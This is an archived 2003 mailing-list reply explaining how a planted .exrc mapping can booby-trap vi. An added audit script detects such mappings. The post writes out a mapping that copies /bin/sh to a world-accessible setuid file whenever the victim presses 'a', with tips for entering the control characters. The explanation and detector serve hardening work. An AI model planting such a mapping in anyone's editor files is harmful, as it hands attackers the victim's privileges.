
Re: .exrc file security risks

From: Jonathan Leffler <jleffler(at)us.ibm.com>
Date: Tue Apr 29 2003 - 21:00:10 EDT

Paul Greene <techlists@comcast.net> asked:
>I'm verifying the validity of a Solaris hardening guide and came across

The spelling is correct; the .exrc file can be used at the startup of the 'ex' or 'vi' family of editors. The .exrc (and relations such as .vimrc - for Vim, a vi workalike - and also the EXINIT environment variable) can contain commands telling ex/vi what to do. Amongst those commands, you can map almost any character to any new command sequence. Such command sequences could include shell escapes triggered by routine operations. For example, you could map the 'a' key along the lines of:

      :map a :!cp /bin/sh /tmp/.quiet; chmod 4777 /tmp/.quiet^V^M:unmap a^V^M:^V^M

This makes the 'a' command (for appending text after the cursor) into something that executes the copy and chmod commands, then unmaps the mapping, and then uses the ':' command to remove the messages. Since this could be placed into a .exrc file with appropriate modifications, anybody whose .exrc (found in your home directory as specified in the password file) was thus booby-trapped could be giving away a SUID shell. OK - the name of the file would have to be fixed, along with various other minor pieces of jiggery-pokery, but the principle is moderately clear, I hope. The ^V characters would have to be entered as control-V (and as control-V control-V in the .exrc file), and the ^M characters would be entered by hitting return - or control-V control-M when editing the .exrc file. The EXINIT environment variable needs to be unset for the .exrc file to take effect. And at least some versions of vi make the expansion of 'a' above rather visible, so a user would probably spot the subterfuge - but that is likely because I've not been careful enough. Alternative scripts can be devised, no doubt, by those more devious (or better informed) than myself.

--
Jonathan Leffler (jleffler@us.ibm.com)
STSM, Informix Database Engineering, IBM Data Management
4100 Bohannon Drive, Menlo Park, CA 94025
Tel: +1 650-926-6921   Tie-Line: 630-6921
      "I don't suffer from insanity; I enjoy every minute of it!"
Received on Thu May 1 12:33:52 2003
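One way a hardening guide could audit for the booby-trap described in the message above, as an added example that is not part of the original post: a POSIX shell check that flags ex/vi startup files writable by group or others, and map/abbreviation lines whose right-hand side reaches a shell escape once the ^V/^M bytes are stripped. The function names, the regex heuristic and the two sample .exrc files are constructed for this demo.

```shell
#!/bin/sh
# Hardening check for .exrc/.vimrc booby-traps (constructed example).
# Flags: (a) startup files writable by group/others, so someone else can
# plant a mapping; (b) map/ab lines whose RHS reaches a shell escape
# (:!cmd, :r!cmd, :w !cmd, or a bare ! filter). ^V (0x16) and ^M (0x0d)
# are removed first so they cannot hide the escape from the regex.
# The regex is a heuristic; review any hit by hand.

MAPCMD='(map!?|noremap|nmap|imap|cmap|ab|abbr|abbreviate)'
SHELLESC='(!|.*(:[[:space:]]*!|:r[[:space:]]*!|:w[[:space:]]+!))'
BAD_MAP="^[[:space:]]*:?${MAPCMD}[[:space:]]+[^[:space:]]+[[:space:]]+${SHELLESC}"

# exrc_loose_perms FILE -> status 0 if FILE is group- or world-writable
exrc_loose_perms() {
    [ -n "$(find "$1" \( -perm -020 -o -perm -002 \) -print 2>/dev/null)" ]
}

# exrc_shell_maps FILE -> prints offending lines (numbered); status 0 if any
exrc_shell_maps() {
    tr -d '\026\015' < "$1" | grep -nE "$BAD_MAP"
}

# exrc_check FILE -> prints findings; status 1 if the file needs attention
exrc_check() {
    f=$1; found=0
    [ -f "$f" ] || return 0
    if exrc_loose_perms "$f"; then
        echo "$f: writable by group/others"; found=1
    fi
    if m=$(exrc_shell_maps "$f"); then
        printf '%s\n' "$m" | sed "s|^|$f: shell escape in mapping, line |"
        found=1
    fi
    return $found
}

# Constructed samples: one benign startup file, one carrying a booby-trap
# (a harmless command stands in for the payload; ^V^M bytes embedded as in
# a real .exrc).
DEMO=$(mktemp -d); DEMO_OK=$DEMO/ok.exrc; DEMO_BAD=$DEMO/bad.exrc
printf 'set autoindent\nmap Q :q!\nab teh the\n' > "$DEMO_OK"
printf 'set showmode\nmap a :!uname -a\026\015:unmap a\026\015:\026\015\n' > "$DEMO_BAD"
chmod 600 "$DEMO_OK"; chmod 666 "$DEMO_BAD"

for f in "$DEMO_OK" "$DEMO_BAD"; do
    exrc_check "$f" || echo "$f: NEEDS ATTENTION"
done
```

Run it over `$HOME/.exrc` and `$HOME/.vimrc` for every account in the password file; a deployment would also examine the EXINIT variable in each user's shell startup files, since a setting there overrides .exrc.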

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:01:37 EDT

